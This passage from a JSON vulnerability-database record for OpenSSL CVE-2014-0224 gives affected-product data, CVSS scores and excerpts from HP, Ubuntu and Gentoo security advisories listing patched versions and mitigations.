              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:rox:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:mariadb:mariadb:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "10.0.13",
                "versionStartIncluding": "10.0.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.4.2",
                "versionStartIncluding": "3.4.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "2.7.8",
                "versionStartIncluding": "2.7.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "0.10.29",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-0224"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "HP",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "127936"
      },
      {
        "db": "PACKETSTORM",
        "id": "127422"
      },
      {
        "db": "PACKETSTORM",
        "id": "127403"
      },
      {
        "db": "PACKETSTORM",
        "id": "127190"
      },
      {
        "db": "PACKETSTORM",
        "id": "128345"
      }
    ],
    "trust": 0.5
  },
  "cve": "CVE-2014-0224",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "impactScore": 4.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "NONE",
            "baseScore": 5.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CVE-2014-0224",
            "impactScore": 4.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "MEDIUM",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.2,
            "impactScore": 5.2,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2014-0224",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201406-080",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2014-0224",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2014-0224"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201406-080"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0224"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCipherSpec messages, which allows man-in-the-middle attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL communications, and consequently hijack sessions or obtain sensitive information, via a crafted TLS handshake, aka the \"CCS Injection\" vulnerability. OpenSSL is prone to security-bypass vulnerability. \nSuccessfully exploiting this issue may allow attackers to obtain sensitive information by conducting a man-in-the-middle attack. This may lead to other attacks. \nVersions prior to OpenSSL 1.0.1 and 1.0.2-beta1 are vulnerable. \n\nHP Connect IT / HP SPM CIT - 9.5x\n Please install: HP Connect IT 9.53.P2\n\nFor Windows\n http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00070\n\nFor Linux\n http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00071\n\nFor AIX\n http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00072\n\nFor HPUX\n http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00073\n\nFor Solaris\n http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00074\n\nHP Connect IT / HP SPM CIT - 9.4x\n Please install: HP Connect IT 9.40.P1\n\nFor windows(en)\n http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00075\n\nFor Linux(en)\n http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00076\n\nFor AIX(en)\n http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00077\n\nFor HPUX(en)\n http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00078\n\nFor Solaris(en)\n http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00079\n\nHP Connect IT / HP SPM AM  5.2x\n Please install: HP Connect IT 9.41.P1\n\nHISTORY\nVersion:1 (rev.1) - 19 August 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. ============================================================================\nUbuntu Security Notice USN-2232-3\nJune 23, 2014\n\nopenssl regression\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n- Ubuntu 13.10\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nUSN-2232-1 introduced a regression in OpenSSL. The upstream fix for\nCVE-2014-0224 caused a regression for certain applications that use\nrenegotiation, such as PostgreSQL. This update fixes the problem. \n\nOriginal advisory details:\n\n J=C3=BCri Aedla discovered that OpenSSL incorrectly handled invalid DTLS\n fragments. This issue only affected Ubuntu 12.04 LTS, Ubuntu 13.10, and\n Ubuntu 14.04 LTS. (CVE-2014-0195)\n  Imre Rad discovered that OpenSSL incorrectly handled DTLS recursions. A\n remote attacker could use this issue to cause OpenSSL to crash, resulting\n in a denial of service. (CVE-2014-0221)\n  KIKUCHI Masashi discovered that OpenSSL incorrectly handled certain\n handshakes. \n (CVE-2014-0224)\n  Felix Gr=C3=B6bert and Ivan Fratri=C4=87 discovered that OpenSSL incorrectly handled\n anonymous ECDH ciphersuites. A remote attacker could use this issue to\n cause OpenSSL to crash, resulting in a denial of service. This issue only\n affected Ubuntu 12.04 LTS, Ubuntu 13.10, and Ubuntu 14.04 LTS. \n (CVE-2014-3470)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n  libssl1.0.0                     1.0.1f-1ubuntu2.4\n\nUbuntu 13.10:\n  libssl1.0.0                     1.0.1e-3ubuntu1.6\n\nUbuntu 12.04 LTS:\n  libssl1.0.0                     1.0.1-4ubuntu5.16\n\nUbuntu 10.04 LTS:\n  libssl0.9.8                     0.9.8k-7ubuntu8.19\n\nAfter a standard system update you need to reboot your computer to make all\nthe necessary changes. \n\nReferences:\n  http://www.ubuntu.com/usn/usn-2232-3\n  http://www.ubuntu.com/usn/usn-2232-1\n  https://launchpad.net/bugs/1332643\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.4\n  https://launchpad.net/ubuntu/+source/openssl/1.0.1e-3ubuntu1.6\n  https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.16\n  https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.19\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 201407-05\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                            http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n    Title: OpenSSL: Multiple vulnerabilities\n     Date: July 27, 2014\n     Bugs: #512506\n       ID: 201407-05\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSL, possibly allowing\nremote attackers to execute arbitrary code. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  dev-libs/openssl           \u003c 1.0.1h-r1             *\u003e= 0.9.8z_p5\n                                                        *\u003e= 0.9.8z_p4\n                                                        *\u003e= 0.9.8z_p1\n                                                        *\u003e= 0.9.8z_p3\n                                                        *\u003e= 0.9.8z_p2\n                                                           *\u003e= 1.0.0m\n                                                         \u003e= 1.0.1h-r1\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in OpenSSL. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll OpenSSL users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-1.0.1h-r1\"\n\nReferences\n==========\n\n[ 1 ] CVE-2010-5298\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-5298\n[ 2 ] CVE-2014-0195\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0195\n[ 3 ] CVE-2014-0198\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0198\n[ 4 ] CVE-2014-0221\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0221\n[ 5 ] CVE-2014-0224\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0224\n[ 6 ] CVE-2014-3470\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3470\n[ 7 ] OpenSSL Security Advisory [05 Jun 2014]\n      http://www.openssl.org/news/secadv_20140605.txt\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201407-05.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. The bulletin does not apply to any other 3rd party application\n(e.g. operating system, web server, or application server) that may be\nrequired to be installed by the customer according instructions in the\nproduct install guide. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04347622\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04347622\nVersion: 1\n\nHPSBHF03052 rev.1 - HP Intelligent Management Center (iMC), HP Network\nProducts including H3C and 3COM Routers and Switches running OpenSSL, Remote\nDenial of Service (DoS), Code Execution, Unauthorized Access, Modification or\nDisclosure of Information\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2014-06-20\nLast Updated: 2014-06-20\n\nPotential Security Impact: Remote Denial of Service (DoS), code execution,\nunauthorized access, modification of information, disclosure of information\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP Intelligent\nManagement Center (iMC), HP Network Products including 3COM and H3C routers\nand switches running OpenSSL. The vulnerabilities could be exploited remotely\nto create a Denial of Service (DoS), execute code, allow unauthorized access,\nmodify or disclose information. \n\nReferences:\n\nCVE-2010-5298 Remote Denial of Service (DoS) or Modification of Information\nCVE-2014-0198 Remote Unauthorized Access (only iMC impacted)\nCVE-2014-0224 Remote Unauthorized Access or Disclosure of Information\nSSRT101561\nNote: All products listed are impacted by CVE-2014-0224 . iMC is also\nimpacted by CVE-2014-0198 and CVE-2010-5298\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nPlease refer to the RESOLUTION\n section below for a list of impacted products. \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n  Reference              Base Vector             Base Score\nCVE-2010-5298    (AV:N/AC:H/Au:N/C:N/I:P/A:P)       4.0\nCVE-2014-0198    (AV:N/AC:M/Au:N/C:N/I:N/A:P)       4.3\nCVE-2014-0224    (AV:N/AC:M/Au:N/C:P/I:P/A:P)       6.8\n===========================================================\n             Information on CVSS is documented\n            in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\nOn June 5th 2014, OpenSSL.org issued an advisory with several CVE\nvulnerabilities. HP Networking is working to release fixes for these\nvulnerabilities that impact the products in the table below. As fixed\nsoftware is made available, this security bulletin will be updated to show\nthe fixed versions. Until the software fixes are available, HP Networking is\nproviding the following information including possible workarounds to\nmitigate the risks of these vulnerabilities. \n\nDescription\n\nThe most serious issue reported is CVE-2014-0224 and it is the one discussed\nhere. To take advantage CVE-2014-0224, an attacker must:\n\nbe in between the OpenSSL client and OpenSSL server. \nbe capable of intercepting and modifying packets between the OpenSSL client\nand OpenSSL server in real time. \n\nWorkarounds\n\nHP Networking equipment is typically deployed inside firewalls and access to\nmanagement interfaces and other protocols is more tightly controlled than in\npublic environments. This deployment and security restrictions help to reduce\nthe possibility of an attacker being able to intercept both OpenSSL client\nand OpenSSL server traffic. \n\nFollowing the guidelines in the Hardening Comware-based devices can help to\nfurther reduce man-in-the-middle opportunities:\n\nhttp://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=c03536\n920\n\nFor an HP Networking device acting as an OpenSSL Server, using a patched\nOpenSSL client or non-OpenSSL client eliminates the risk. As an example, most\nmodern web browsers do not use the OpenSSL client and the sessions between\nthe HP Networking OpenSSL server and the non-OpenSSL client are not at risk\nfor this attack. For HP Networking Equipment that is using an OpenSSL client,\npatching the OpenSSL server will eliminate the risk of this attack. \n\nProtocol Notes\n\nThe following details the protocols that use OpenSSL in Comware v5 and\nComware v7:\n\nComware V7:\n\nServer:\n\nFIPS/HTTPS/Load Balancing/Session Initiation Protocol\n\nClient:\n\nLoad Balancing/OpenFlow/Session Initiation Protocol/State Machine Based\nAnti-Spoofing/Dynamic DNS\n\nComware V5:\n\nServer:\n\nCAPWAP/EAP/SSLVPN\n\nClient:\n\nDynamic DNS\n\nFamily\n Fixed Version\n HP Branded Products Impacted\n H3C Branded Products Impacted\n 3Com Branded Products Impacted\n\n12900 Switch Series\n Fix in progress\nuse mitigations\n JG619A HP FF 12910 Switch AC Chassis\nJG621A HP FF 12910 Main Processing Unit\nJG632A HP FF 12916 Switch AC Chassis\nJG634A HP FF 12916 Main Processing Unit\n\n12500\n Fix in progress\nuse mitigations\n JC085A HP A12518 Switch Chassis\nJC086A HP A12508 Switch Chassis\nJC652A HP 12508 DC Switch Chassis\nJC653A HP 12518 DC Switch Chassis\nJC654A HP 12504 AC Switch Chassis\nJC655A HP 12504 DC Switch Chassis\nJF430A HP A12518 Switch Chassis\nJF430B HP 12518 Switch Chassis\nJF430C HP 12518 AC Switch Chassis\nJF431A HP A12508 Switch Chassis\nJF431B HP 12508 Switch Chassis\nJF431C HP 12508 AC Switch Chassis\nJC072B HP 12500 Main Processing Unit\nJC808A HP 12500 TAA Main Processing Unit\n H3C S12508 Routing Switch(AC-1) (0235A0GE)\nH3C S12518 Routing Switch(AC-1) (0235A0GF)\nH3C S12508 Chassis (0235A0E6)\nH3C S12508 Chassis (0235A38N)\nH3C S12518 Chassis (0235A0E7)\nH3C S12518 Chassis (0235A38M)\n\n12500 (Comware v7)\n Fix in progress\nuse mitigations\n JC085A HP A12518 Switch Chassis\nJC086A HP A12508 Switch Chassis\nJC652A HP 12508 DC Switch Chassis\nJC653A HP 12518 DC Switch Chassis\nJC654A HP 12504 AC Switch Chassis\nJC655A HP 12504 DC Switch Chassis\nJF430A HP A12518 Switch Chassis\nJF430B HP 12518 Switch Chassis\nJF430C HP 12518 AC Switch Chassis\nJF431A HP A12508 Switch Chassis\nJF431B HP 12508 Switch Chassis\nJF431C HP 12508 AC Switch Chassis\nJC072B HP 12500 Main Processing Unit\nJG497A HP 12500 MPU w/Comware V7 OS\nJG782A HP FF 12508E AC Switch Chassis\nJG783A HP FF 12508E DC Switch Chassis\nJG784A HP FF 12518E AC Switch Chassis\nJG785A HP FF 12518E DC Switch Chassis\nJG802A HP FF 12500E MPU\n H3C S12508 Routing Switch(AC-1) (0235A0GE)\nH3C S12518 Routing Switch(AC-1) (0235A0GF)\nH3C S12508 Chassis (0235A0E6)\nH3C S12508 Chassis (0235A38N)\nH3C S12518 Chassis (0235A0E7)\nH3C S12518 Chassis (0235A38M)\n\n11900 Switch Series\n Fix in progress\nuse mitigations\n JG608A HP FF 11908-V Switch Chassis\nJG609A HP FF 11900 Main Processing Unit\n\n10500 Switch Series (Comware v5)\n Fix in progress\nuse mitigations\n JC611A HP 10508-V Switch Chassis\nJC612A HP 10508 Switch Chassis\nJC613A HP 10504 Switch Chassis\nJC614A HP 10500 Main Processing Unit\nJC748A HP 10512 Switch Chassis\nJG375A HP 10500 TAA Main Processing Unit\nJG820A HP 10504 TAA Switch Chassis\nJG821A HP 10508 TAA Switch Chassis\nJG822A HP 10508-V TAA Switch Chassis\nJG823A HP 10512 TAA Switch Chassis\n\n10500 Switch Series (Comware v7)\n Fix in progress\nuse mitigations\n JC611A HP 10508-V Switch Chassis\nJC612A HP 10508 Switch Chassis\nJC613A HP 10504 Switch Chassis\nJC748A HP 10512 Switch Chassis\nJG820A HP 10504 TAA Switch Chassis\nJG821A HP 10508 TAA Switch Chassis\nJG822A HP 10508-V TAA Switch Chassis\nJG823A HP 10512 TAA Switch Chassis\nJG496A HP 10500 Type A MPU w/Comware v7 OS\n\n9500E\n Fix in progress\nuse mitigations\n JC124A HP A9508 Switch Chassis\nJC124B HP 9505 Switch Chassis\nJC125A HP A9512 Switch Chassis\nJC125B HP 9512 Switch Chassis\nJC474A HP A9508-V Switch Chassis\nJC474B HP 9508-V Switch Chassis\n H3C S9505E Routing-Switch Chassis (0235A0G6)\nH3C S9508E-V Routing-Switch Chassis (0235A38Q)\nH3C S9512E Routing-Switch Chassis (0235A0G7)\nH3C S9508E-V Routing-Switch Chassis (0235A38Q)\nH3C S9505E Chassis w/ Fans (0235A38P)\nH3C S9512E Chassis w/ Fans (0235A38R)\n\nRouter 8800\n Fix in progress\nuse mitigations\n JC147A HP A8802 Router Chassis\nJC147B HP 8802 Router Chassis\nJC148A HP A8805 Router Chassis\nJC148B HP 8805 Router Chassis\nJC149A HP A8808 Router Chassis\nJC149B HP 8808 Router Chassis\nJC150A HP A8812 Router Chassis\nJC150B HP 8812 Router Chassis\nJC141A HP 8802 Main Control Unit Module\nJC138A HP 8805/08/12 (1E) Main Cntrl Unit Mod\nJC137A HP 8805/08/12 (2E) Main Cntrl Unit Mod\n H3C SR8805 10G Core Router Chassis (0235A0G8)\nH3C SR8808 10G Core Router Chassis (0235A0G9)\nH3C SR8812 10G Core Router Chassis (0235A0GA)\nH3C SR8802 10G Core Router Chassis (0235A0GC)\nH3C SR8802 10G Core Router Chassis (0235A31B)\nH3C SR8805 10G Core Router Chassis (0235A31C)\nH3C SR8808 10G Core Router Chassis (0235A31D)\nH3C SR8812 10G Core Router Chassis (0235A31E)\n\n7500 Switch Series\n Fix in progress\nuse mitigations\n JC666A HP A7503-S 144 Gbps Fab/MPU w 24p Gig-T\nJC697A HP A7502 TAA Main Processing Unit\nJC698A HP A7503S 144 Gbps TAA Fab/MPU w 24p GbE\nJC699A HP A7500 384Gbps TAA Fab/MPU w 2p 10-GbE\nJC700A HP A7500 384 Gbps TAA Fabric / MPU\nJC701A HP A7510 768 Gbps TAA Fabric / MPU\nJD193A HP 384 Gbps A7500 Fab Mod w/2 XFP Ports\nJD193B HP 7500 384Gbps Fab Mod w/2 XFP Ports\nJD194A HP 384 Gbps Fabric A7500 Module\nJD194B HP 7500 384Gbps Fabric Module\nJD195A HP 7500 384Gbps Advanced Fabric Module\nJD196A HP 7502 Fabric Module\nJD220A HP 7500 768Gbps Fabric Module\nJD238A HP A7510 Switch Chassis\nJD238B HP 7510 Switch Chassis\nJD239A HP A7506 Switch Chassis\nJD239B HP 7506 Switch Chassis\nJD240A HP A7503 Switch Chassis\nJD240B HP 7503 Switch Chassis\nJD241A HP A7506 Vertical Switch Chassis\nJD241B HP 7506-V Switch Chassis\nJD242A HP A7502 Switch Chassis\nJD242B HP 7502 Switch Chassis\nJD243A HP A7503 Switch Chassis w/1 Fabric Slot\nJD243B HP 7503-S Switch Chassis w/1 Fabric Slot\n H3C S7502E Ethernet Switch Chassis with Fan (0235A0G4)\nH3C S7503E Ethernet Switch Chassis with Fan (0235A0G2)\nH3C S7503E-S Ethernet Switch Chassis with Fan (0235A0G5)\nH3C S7506E Ethernet Switch Chassis with Fan (0235A0G1)\nH3C S7506E-V Ethernet Switch Chassis with Fan (0235A0G3)\nH3C S7510E Ethernet Switch Chassis with Fan (0235A0G0)\nH3C S7502E Chassis w/ fans (0235A29A)\nH3C S7503E Chassis w/ fans (0235A27R)\nH3C S7503E-S Chassis w/ fans (0235A33R)\nH3C S7506E Chassis w/ fans (0235A27Q)\nH3C S7506E-V Chassis w/ fans (0235A27S)\n\nHSR6800\n Fix in progress\nuse mitigations\n JG361A HP HSR6802 Router Chassis\nJG362A HP HSR6804 Router Chassis\nJG363A HP HSR6808 Router Chassis\nJG364A HP HSR6800 RSE-X2 Router MPU\nJG779A HP HSR6800 RSE-X2 Router TAA MPU\n\nHSR6800 Russian Version\n Fix in progress\nuse mitigations\n JG361A HP HSR6802 Router Chassis\nJG362A HP HSR6804 Router Chassis\nJG363A HP HSR6808 Router Chassis\nJG364A HP HSR6800 RSE-X2 Router MPU\nJG779A HP HSR6800 RSE-X2 Router TAA MPU\n\nHSR6602\n Fix in progress\nuse mitigations\n JG353A HP HSR6602-G Router\nJG354A HP HSR6602-XG Router\nJG776A HP HSR6602-G TAA Router\nJG777A HP HSR6602-XG TAA Router\n\nHSR6602 Russian Version\n Fix in progress\nuse mitigations\n JG353A HP HSR6602-G Router\nJG354A HP HSR6602-XG Router\nJG776A HP HSR6602-G TAA Router\nJG777A HP HSR6602-XG TAA Router\n\nA6600\n Fix in progress\nuse mitigations\n JC177A HP 6608 Router\nJC177B HP A6608 Router Chassis\nJC178A HP 6604 Router Chassis\nJC178B HP A6604 Router Chassis\nJC496A HP 6616 Router Chassis\nJC566A HP A6600 RSE-X1 Main Processing Unit\nJG780A HP 6600 RSE-X1 Router TAA MPU\n H3C RT-SR6608-OVS-H3 (0235A32X)\nH3C RT-SR6604-OVS-H3 (0235A37X)\nH3C SR6616 Router Chassis (0235A41D)\n\nA6600 Russian Version\n Fix in progress\nuse mitigations\n JC177A HP 6608 Router\nJC177B HP A6608 Router Chassis\nJC178A HP 6604 Router Chassis\nJC178B HP A6604 Router Chassis\nJC496A HP 6616 Router Chassis\nJC566A HP A6600 RSE-X1 Main Processing Unit\nJG780A HP 6600 RSE-X1 Router TAA MPU\n H3C RT-SR6608-OVS-H3 (0235A32X)\nH3C RT-SR6604-OVS-H3 (0235A37X)\nH3C SR6616 Router Chassis (0235A41D)\n\n6600 MCP\n Fix in progress\nuse mitigations\n JC177A HP 6608 Router\nJC177B HP A6608 Router Chassis\nJC178A HP 6604 Router Chassis\nJC178B HP A6604 Router Chassis\nJC496A HP 6616 Router Chassis\nJG778A HP 6600 MCP-X2 Router TAA MPU. JG355A HP 6600 MCP-X1 Router MPU\nJG356A HP 6600 MCP-X2 Router MPU\n H3C RT-SR6608-OVS-H3 (0235A32X)\nH3C RT-SR6604-OVS-H3 (0235A37X)\nH3C SR6616 Router Chassis (0235A41D)\n\n6600 MCP Russian Version\n Fix in progress\nuse mitigations\n JC177A HP 6608 Router\nJC177B HP A6608 Router Chassis\nJC178A HP 6604 Router Chassis\nJC178B HP A6604 Router Chassis\nJC496A HP 6616 Router Chassis\nJG778A HP 6600 MCP-X2 Router TAA MPU\nJG355A HP 6600 MCP-X1 Router MPU\nJG356A HP 6600 MCP-X2 Router MPU\n H3C RT-SR6608-OVS-H3 (0235A32X)\nH3C RT-SR6604-OVS-H3 (0235A37X)\nH3C SR6616 Router Chassis (0235A41D)\n\n5920 Switch Series\n Fix in progress\nuse mitigations\n JG296A HP 5920AF-24XG Switch\nJG555A HP 5920AF-24XG TAA Switch\n\n5900 Switch Series\n Fix in progress\nuse mitigations\n JC772A HP 5900AF-48XG-4QSFP+ Switch\nJG336A HP 5900AF-48XGT-4QSFP+ Switch\nJG510A HP 5900AF-48G-4XG-2QSFP+ Switch\nJG554A HP 5900AF-48XG-4QSFP+ TAA Switch\nJG838A HP FF 5900CP-48XG-4QSFP+ Switch\n\n5900 Virtual Switch\n Fix in progress\nuse mitigations\n JG814AAE HP Virtual Switch 5900v VMware E-LTU\nJG815AAE HP VSO SW for 5900v VMware E-LTU\n\n5830 Switch Series\n Fix in progress\nuse mitigations\n JC691A HP A5830AF-48G Switch w/1 Interface Slot\nJC694A HP A5830AF-96G Switch\nJG316A HP 5830AF-48G TAA Switch w/1 Intf Slot\nJG374A HP 5830AF-96G TAA Switch\n\n5820 Switch Series\n Fix in progress\nuse mitigations\n JC102A HP 5820-24XG-SFP+ Switch\nJC106A HP 5820-14XG-SFP+ Switch with 2 Slots\nJG219A HP 5820AF-24XG Switch\nJG243A HP 5820-24XG-SFP+ TAA-compliant Switch\nJG259A HP 5820X-14XG-SFP+ TAA Switch w 2 Slots\n H3C S5820X-28C 14 port (SFP Plus ) Plus 4-port BT (RJ45) Plus 2 media\nmodules Plus OSM (0235A37L)\nH3C S5820X-28S 24-port 10GBASE-X (SFP Plus ) Plus 4-port 10/100/1000BASE-T\n(RJ45) (0235A370)\n\n5800 Switch Series\n Fix in progress\nuse mitigations\n JC099A HP 5800-24G-PoE Switch\nJC100A HP 5800-24G Switch\nJC101A HP 5800-48G Switch with 2 Slots\nJC103A HP 5800-24G-SFP Switch\nJC104A HP 5800-48G-PoE Switch\nJC105A HP 5800-48G Switch\nJG225A HP 5800AF-48G Switch\nJG242A HP 5800-48G-PoE+ TAA Switch w 2 Slots\nJG254A HP 5800-24G-PoE+ TAA-compliant Switch\nJG255A HP 5800-24G TAA-compliant Switch\nJG256A HP 5800-24G-SFP TAA Switch w 1 Intf Slt\nJG257A HP 5800-48G-PoE+ TAA Switch with 1 Slot\nJG258A HP 5800-48G TAA Switch w 1 Intf Slot\n H3C S5800-32C - 24-port 1BT Plus 4-port (SFP Plus ) Plus 1 media slot\n(0235A36U)\nH3C S5800-32C-PWR - 24-port 10/100/1000BASE-T (RJ45) Plus 4-port 10GBASE-X\n(SFP Plus ) Plus 1 media module PoE (0235A36S)\nH3C S5800-32F 24-port 1000BASE-X (SFP) Plus 4-port 10GBASE-X (SFP Plus ) Plus\nmedia module (no power) (0235A374)\nH3C S5800-56C 48-port 10/100/1000BASE-T (RJ45) Plus 4port 10GBASE-X (SFP Plus\n) Plus media module (0235A379)\nH3C S5800-56C-PWR 48-port BT Plus 4 port (SFP Plus ) Plus media module\n(0235A378)\nH3C S5800-60C-PWR 48-port BT Plus 4-port SFP Plus 2 media modules Plus OSM\n(0235A36W)\n\n5500 HI Switch Series\n Fix in progress\nuse mitigations\n JG311A HP HI 5500-24G-4SFP w/2 Intf Slts Switch\nJG312A HP HI 5500-48G-4SFP w/2 Intf Slts Switch\nJG541A HP 